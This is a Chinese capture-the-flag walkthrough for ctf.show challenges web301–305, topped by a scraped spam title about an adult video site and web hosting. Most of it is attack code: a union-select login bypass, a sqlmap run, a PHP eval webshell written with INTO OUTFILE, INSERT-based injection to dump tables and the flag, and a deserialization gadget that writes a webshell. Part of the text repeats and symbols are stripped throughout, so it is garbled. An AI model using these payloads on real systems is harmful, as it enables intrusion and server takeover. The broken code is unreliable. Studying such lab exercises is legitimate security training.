做羞羞的事视频网站,一个织梦两个网站,网站名称与备案名称不一致,深圳建网站信科web301
在checklogin.php 发现了
$sqlselect sds_password from sds_user where sds_username.$username. order by id limit 1;;在联合查询并不存在的数据时#xff0c;联合查询就会构造一个虚拟的数据就相当于构造了一个虚拟账户#xff0c;可以…web301
在checklogin.php 发现了
$sqlselect sds_password from sds_user where sds_username.$username. order by id limit 1;;在联合查询并不存在的数据时联合查询就会构造一个虚拟的数据就相当于构造了一个虚拟账户可以使用这个账户登录 mysql的特性 在联合查询并不存在的数据时联合查询就会构造一个虚拟的数据就相当于构造了一个虚拟账户可以使用这个账户登录 然后我们就伪造了密码就可以进行登录了
username:
-1 union select 1#
password:
1sqlmap
python .\sqlmap.py -u http://fddf2115-423b-4701-b77b-8ef5f2194ee7.challenge.ctf.show:8080/ --form --batch --dumpuserida union select ?php eval($_POST[1]);? into outfile /var/www/html/shell.php%23userpwd1
然后访问shell.php再rceweb302
if(!strcasecmp(sds_decode($userpwd),$row[sds_password])){
改变的地方?php
function sds_decode($str){return md5(md5($str.md5(base64_encode(sds))).sds);
}
$str1;
var_dump(sds_decode($str));
?
这里$str随便命令相应的把密码改了就行了userid:
-1 union select d9c77c4e454869d5d8da3b4be79694d3#
userpass:
1web303
在文件里面就看到了
if(strlen($username)6){die();
}然后就没看到啥了 也没看到
$sqlinsert into sds_dpt set sds_name.$dpt_name.,sds_address .$dpt_address.,sds_build_date.$dpt_build_year.,sds_have_safe_card.$dpt_has_cert.,sds_safe_card_num.$dpt_cert_number.,sds_telephone.$dpt_telephone_number.;;
这里使用insert注入在dptadd.php注入
dpt_name-1,sds_address(select group_concat(table_name) from information_schema.tables where table_schemadatabase())#dpt_name-1,sds_address(select group_concat(column_name) from information_schema.columns where table_namesds_fl9g)#dpt_name-1,sds_address(select flag from sds_fl9g)#web304
function sds_waf($str){return preg_match(/[0-9]|[a-z]|-/i, $str);
}
正则过滤了这些东西那么做法与上题一样没啥区别不知道过滤的啥
web305
多了这一段
$user_cookie $_COOKIE[user];
if(isset($user_cookie)){$user unserialize($user_cookie);
}而且还在fun.php里面多了
function sds_waf($str){if(preg_match(/\~|\|\!|\|\#|\$|\%|\^|\|\*|\(|\)|\_|\|\|\{|\}|\[|\]|\;|\:|\|\|\,|\.|\?|\/|\\\|\|\/, $str)){return false;}else{return true;}
}
?利用序列化写个小马
?php
class user{public $username;public $password;public function __construct($u,$p){$this-username$u;$this-password$p;}public function __destruct(){file_put_contents($this-username, $this-password);}
}
$anew user(1.php,?php eval($_POST[1]);?);
echo urlencode(serialize($a));?在corn.php中发现远程SQL
$mysqluserroot;
$mysqlpwdroot;
$mysqldbsds;
$mysqlhostlocalhost;
$mysqlport3306;找了好久终于知道怎么用antsword链接数据库了右击数据管理 我还在这里写注入语句我真傻逼
